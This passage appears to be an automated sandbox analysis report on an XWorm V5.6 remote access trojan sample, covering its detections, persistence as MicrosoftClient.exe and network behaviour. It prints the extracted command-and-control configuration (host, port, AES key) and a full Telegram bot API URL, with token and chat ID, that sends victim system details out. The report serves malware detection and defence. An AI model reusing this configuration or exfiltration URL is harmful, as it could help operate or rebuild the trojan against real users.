Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Queries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Queries volume information: C:\Users\user\AppData\Local\MicrosoftClient.exe VolumeInformation

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001C028000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BFBC000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3413186883.000000001BF80000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3419695572.000000001D070000.00000004.00000020.00020000.00000000.sdmp, 9RgE5uOJwX.exe, 00000000.00000002.3374595417.00000000012CC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RgE5uOJwX.exe PID: 2732, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true
147.185.221.23	vehicle-temp.gl.at.ply.gg	United States		12087	SALSGIVERUS	true

Contacted Domains

Name	IP	Active
vehicle-temp.gl.at.ply.gg	147.185.221.23	true
api.telegram.org	149.154.167.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
vehicle-temp.gl.at.ply.gg	true		unknown
https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6	true		unknown

AV Detection

Found malware configuration

Source: 9RgE5uOJwX.exe

Malware Configuration Extractor: Xworm {"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\MicrosoftClient.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: 9RgE5uOJwX.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\MicrosoftClient.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9RgE5uOJwX.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 9RgE5uOJwX.exe	String decryptor: vehicle-temp.gl.at.ply.gg
Source: 9RgE5uOJwX.exe	String decryptor: 1930
Source: 9RgE5uOJwX.exe	String decryptor: <!QAZxcvbnm,./>
Source: 9RgE5uOJwX.exe	String decryptor: <Xwormmm>
Source: 9RgE5uOJwX.exe	String decryptor: XWorm V5.6
Source: 9RgE5uOJwX.exe	String decryptor: USB.exe
Source: 9RgE5uOJwX.exe	String decryptor: %LocalAppData%
Source: 9RgE5uOJwX.exe	String decryptor: MicrosoftClient.exe

Uses 32bit PE files

Source: 9RgE5uOJwX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2

Source: 9RgE5uOJwX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49399 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: vehicle-temp.gl.at.ply.gg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49406 -> 147.185.221.23:1930

HTTP GET or POST without a user agent

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.23 147.185.221.23

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: vehicle-temp.gl.at.ply.gg

Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coiops
Source: powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 9RgE5uOJwX.exe, MicrosoftClient.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49399

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 9RgE5uOJwX.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D6936	0_2_00007FFD343D6936
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D76E2	0_2_00007FFD343D76E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440947D	2_2_00007FFD3440947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344084F3	2_2_00007FFD344084F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440B9FA	2_2_00007FFD3440B9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344025FD	2_2_00007FFD344025FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34402793	2_2_00007FFD34402793
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34405C43	2_2_00007FFD34405C43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440BBFB	2_2_00007FFD3440BBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34403FFA	2_2_00007FFD34403FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34405BFA	2_2_00007FFD34405BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EB9FA	5_2_00007FFD343EB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E0E63	5_2_00007FFD343E0E63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E5EFA	5_2_00007FFD343E5EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E9EFB	5_2_00007FFD343E9EFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E26F5	5_2_00007FFD343E26F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EB7FC	5_2_00007FFD343EB7FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EABF2	5_2_00007FFD343EABF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343DB9FA	8_2_00007FFD343DB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D26D3	8_2_00007FFD343D26D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343DBBFB	8_2_00007FFD343DBBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DB9FA	11_2_00007FFD343DB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D26D3	11_2_00007FFD343D26D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D2A6D	11_2_00007FFD343D2A6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DB7FC	11_2_00007FFD343DB7FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DABF2	11_2_00007FFD343DABF2
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 13_2_00007FFD34400EFA	13_2_00007FFD34400EFA
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 14_2_00007FFD343E0EFA	14_2_00007FFD343E0EFA

Sample file is different than original file name gathered from version info

Source: 9RgE5uOJwX.exe, 00000000.00000002.3411654159.0000000013049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
Source: 9RgE5uOJwX.exe, 00000000.00000000.2129779866.0000000000D13000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
Source: 9RgE5uOJwX.exe	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe

Uses 32bit PE files

Source: 9RgE5uOJwX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 9RgE5uOJwX.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'

Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/19@2/2

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File created: C:\Users\user\AppData\Local\MicrosoftClient.exe

Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Mutant created: \Sessions\1\BaseNamedObjects\5mzBrJAeAQUAJ7jq
